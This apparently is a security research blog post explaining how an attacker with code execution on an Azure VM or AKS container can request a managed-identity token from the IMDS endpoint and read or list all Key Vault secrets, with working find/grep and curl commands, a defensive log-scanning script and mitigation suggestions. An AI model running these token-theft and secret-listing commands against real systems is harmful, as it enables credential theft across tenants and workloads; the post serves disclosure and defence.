
Hacking Azure Key Vault

7 min read · Nov 1, 2023

Exploring Authentication Problem

We will discuss a security issue in Key Vault, specifically in its managed identity authentication feature, and how it could allow an attacker who has compromised one container to access the secrets of every container on the same node in environments where this feature is in use.

Note: All information is for ethical purposes only.

Table of Contents

1. The Secret Management Challenge
2. Azure Key Vault Role and Security Challenges
3. Azure’s Managed Identities for Authentication
4. Practical Implementation: Azure’s Authentication Solution
5. Understanding ManagedIdentityCredential() and Its Role in Key-Vault Authentication
6. Issues with the Authentication Solution
7. Attack vector: exploiting the mechanism
8. Secure Implementation Plan
9. References

1. The Secret Management Challenge

The issue of secret management is significant in the context of application security. The requirement for trustworthy and reliable authentication systems grows ever more important as applications become more interconnected and integrate with databases, services, and third-party components. However, a critical issue still needs to be addressed: how can we protect these login details and authentication credentials in the face of the rising risk of remote code execution (RCE) on the underlying virtual machines or containers?

Several solutions have been developed in response to this problem, with HashiCorp Vault and Azure Key-Vault leading among them, with the goal of preventing attackers from using secrets found on compromised machines and protecting sensitive information. In this research, we focus on Azure Key-Vault, investigating its features and analyzing how it deals with the complex issue of secret management in contemporary applications and cloud environments.

2. Azure Key-Vault Role and Security Challenges

A secret manager is a tool or service that helps securely store and manage sensitive information, such as passwords, API keys, and certificates.

The issue often encountered with most secret management systems lies in the authentication required to access them. Since secret managers are designed to prevent the unrestricted use of secrets on a machine, keeping an unprotected key on that same machine violates this fundamental security concept and potentially makes it easier for attackers to reach the secrets.

Therefore, we’ve lately seen many methods for managing this securely. Azure Key Vault, a Microsoft Azure service that provides storage and management of cryptographic keys, secrets, and certificates, claims to solve it by offering an alternative to traditional key-based authentication through the “managed identities” approach.

3. Azure’s Managed Identities for Authentication

Azure Managed Identities is a feature that gives Azure resources an identity with which they can access other Azure services without the need for explicit credentials.

  • The feature allows you to create an identity for your Azure resources such as Virtual Machines, Azure Functions, and App Service instances.
  • This managed identity is essentially a principal that represents the resource in Azure Active Directory (Azure AD).

Azure’s documentation:

“A common challenge for developers is the management of secrets, credentials, certificates, and keys used to secure communication between services. Managed identities eliminate the need for developers to manage these credentials. While developers can securely store the secrets in Azure Key Vault, services need a way to access Azure Key Vault. Managed identities provide an automatically managed identity in Azure Active Directory (Azure AD) for applications to use when connecting to resources that support Azure AD authentication. Applications can use managed identities to obtain Azure AD tokens without having to manage any credentials.”

4. Practical Implementation: Azure’s Authentication Solution

Based on Azure documentation, the secure way to implement the authentication is to retrieve secrets from code using the Azure SDK libraries.

For the testing I implemented it in Python, which has two Azure libraries for this: “azure.identity” and “azure.keyvault.secrets”.
The code uses managed identity authentication to “securely” connect to the vault and retrieve secrets.

Figure 1: Implementation in container architecture based on the documentation

Implementation in Python:

from azure.identity import ManagedIdentityCredential
from azure.keyvault.secrets import SecretClient

# Vault URL and secret name; no key is stored in the code, the host's managed identity is used instead
key_vault_url = "https://your-key-vault-name.vault.azure.net/"
secret_name = "your-secret-name"

credential = ManagedIdentityCredential()  # obtains a token for the resource's managed identity
secret_client = SecretClient(vault_url=key_vault_url, credential=credential)
retrieved_secret = secret_client.get_secret(secret_name)  # the secret value is in retrieved_secret.value

5. Understanding ManagedIdentityCredential() and Its Role in Key-Vault Authentication

ManagedIdentityCredential() is a credential class provided by the Azure SDK for Python (azure-identity) that authenticates with Azure services using managed identities. It doesn’t require explicit credentials such as client IDs and secrets to authenticate your application; instead, it leverages the managed identity associated with the Azure resource where your application is running.

After investigating, I found that the ManagedIdentityCredential() class retrieves a token from 169.254.169.254, the IP address of Azure IMDS.

Azure IMDS (Instance Metadata Service) is a RESTful endpoint that provides information about a virtual machine’s configuration and can be used for tasks like dynamic configuration and access to Azure services. It is accessible from within the virtual machine and provides metadata without the need for explicit credentials, so it relies on the security of the underlying infrastructure. If an attacker gains access to the virtual machine, they may potentially access IMDS without authentication or credentials.

IMDS returns a newly generated managed identity token. Instead of storing a key to authenticate with Key-Vault, ManagedIdentityCredential() uses this managed identity token to authenticate with Key-Vault.

6. Issues with the Authentication Solution

The problem with this solution arises when an attacker gains access to the virtual machine. When ManagedIdentityCredential() is used for authentication with Azure Key-Vault, it relies on Azure IMDS (Instance Metadata Service) to acquire a managed identity token without needing explicit credentials, and this dependence on IMDS introduces a security concern: the attacker can use the same access to authenticate with Key-Vault, gaining access to all stored secrets and compromising sensitive information. Furthermore, in containerized environments like AKS or Docker, Azure IMDS remains reachable by default, potentially allowing attackers to access the host’s Key-Vault and further amplifying the risk.

7. Attack vector: exploiting the mechanism

Figure 2: Utilizing Access, Attacker’s Perspective

Compromising Steps:

1. Discover the Vault URL and secret information, which is typically found within the code using managed identity or in environment variables:

find /path/to/search -type f -exec grep -H '.vault.azure.net' {} \;
find /path/to/search -type f -exec grep -H 'secret' {} \;

2. Acquire the Managed Identity Authentication Token:

You can obtain a token by accessing the Managed Identity Authentication endpoint, which follows this format:

http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net

Use a tool or script to make a request to this endpoint and extract the access token:

token=$(curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" | jq -r .access_token)

3. Exploit the Token to Access Azure Key Vault:

Armed with the acquired token, you can now authenticate with Azure Key Vault, gaining access to stored secrets.

Replace <vault-name> with the name of the Key Vault resource (gathered in step 1 or using IMDS information gathering).

Replace <secret-name> with the name of the secret, or leave it blank to list all secrets.

access_token=$(curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" | jq -r .access_token)

curl -H "Authorization: Bearer $access_token" "https://<vault-name>.vault.azure.net/secrets/<secret-name>?api-version=7.1"
# Replace <secret-name> with the name of the secret; if you don't know the name, leave it blank:
# curl -H "Authorization: Bearer $access_token" "https://<vault-name>.vault.azure.net/secrets/?api-version=7.1"

This process allows any attacker with access to the compromised machine to authenticate with Key Vault and retrieve the stored secrets. It undermines the intended security of Azure’s solution, which was designed to provide a more secure alternative to authenticating with KeyVault compared to using traditional keys that could be exploited on the same machine.

Additionally, in an AKS environment this allows access to the secrets of all the containers on the same node; some of them belong to different namespaces, so the impact can be critical.
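As an added defensive example (not code from the original post): a small Python check that scans Key Vault audit log lines for the two traces the misuse above leaves, a SecretList call (the blank-name listing used when the secret name is unknown) and a managed identity reading a secret it was never deployed to use. The log lines are constructed, and the field names (operationName, identity.claim.oid, properties.id) are assumed from the Key Vault AuditEvent diagnostic-log schema.

```python
import json

# Constructed sample lines in the shape of Key Vault AuditEvent diagnostic logs
# (field names assumed from the diagnostic schema; every value is made up).
SAMPLE_LOGS = [
    '{"time":"2023-11-01T10:00:01Z","operationName":"SecretGet","callerIpAddress":"10.0.1.5",'
    '"identity":{"claim":{"oid":"mi-payments"}},'
    '"properties":{"id":"https://kv-example.vault.azure.net/secrets/db-password/a1b2"}}',
    '{"time":"2023-11-01T10:05:00Z","operationName":"SecretGet","callerIpAddress":"10.0.1.5",'
    '"identity":{"claim":{"oid":"mi-payments"}},'
    '"properties":{"id":"https://kv-example.vault.azure.net/secrets/db-password/a1b2"}}',
    '{"time":"2023-11-01T11:42:10Z","operationName":"SecretList","callerIpAddress":"10.0.1.5",'
    '"identity":{"claim":{"oid":"mi-payments"}},'
    '"properties":{"id":"https://kv-example.vault.azure.net/secrets"}}',
    '{"time":"2023-11-01T11:42:15Z","operationName":"SecretGet","callerIpAddress":"10.0.1.5",'
    '"identity":{"claim":{"oid":"mi-payments"}},'
    '"properties":{"id":"https://kv-example.vault.azure.net/secrets/other-team-api-key/c3d4"}}',
]

# Secrets each managed identity is expected to read; assumed to come from the
# deployment configuration of the workloads that own these identities.
BASELINE = {"mi-payments": {"db-password"}}


def parse_events(lines):
    """Turn raw JSON log lines into (time, principal oid, operation, secret name) tuples."""
    events = []
    for line in lines:
        rec = json.loads(line)
        oid = rec["identity"]["claim"]["oid"]
        secret_id = rec["properties"]["id"]
        # A SecretList targets the /secrets collection itself, so there is no secret name;
        # a SecretGet id may carry a trailing version segment, which is dropped here.
        name = secret_id.split("/secrets/", 1)[1].split("/")[0] if "/secrets/" in secret_id else None
        events.append((rec["time"], oid, rec["operationName"], name))
    return events


def find_suspicious(events, baseline):
    """Flag enumeration (SecretList) and reads of secrets outside a principal's baseline."""
    alerts = []
    for time, oid, op, name in events:
        if op == "SecretList":
            alerts.append((time, oid, "enumeration", None))
        elif op == "SecretGet" and name not in baseline.get(oid, set()):
            alerts.append((time, oid, "unexpected-secret", name))
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(parse_events(SAMPLE_LOGS), BASELINE):
        print(alert)
```

Because the token carries the identity of the host resource, the caller IP and principal look legitimate in these logs; the baseline comparison is what separates the workload's normal reads from an attacker using its identity.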

8. Secure Implementation Plan

To enhance security and protect Key-Vault authentication credentials, consider the following measures:

1. Utilize Key-Based Authentication with Vault:

Implement a secure key-based authentication mechanism to connect with Azure Key-Vault. This approach ensures that direct access to Key-Vault credentials is not required within the application code.

2. Implement Runtime Key Protection:

Introduce runtime security mechanisms within your application to protect the key; this can be done using key encryption or access control.

3. Consider using a third party solution or other services.

9. References

  • Azure role and challenges

“Azure Key Vault provides a way to securely store credentials and other keys and secrets, but your code needs to authenticate to Key Vault to retrieve them. Using a managed identity makes solving this problem simpler by giving Azure services an automatically managed identity in Azure AD”

Key Vault documentation: https://learn.microsoft.com/en-us/azure/key-vault/general/basic-concepts

  • Python implementation

As recommended in https://learn.microsoft.com/en-us/azure/key-vault/general/tutorial-python-virtual-machine?tabs=azure-cli


Note: The research was performed outside of my work at Accenture Security and has no connection to it.


Written by Chen Shiri

Cyber Security Researcher, Hacker | Maglan- Cyber Warfare and IT Security Research Labs. Twitter: https://twitter.com/ChenShiri73
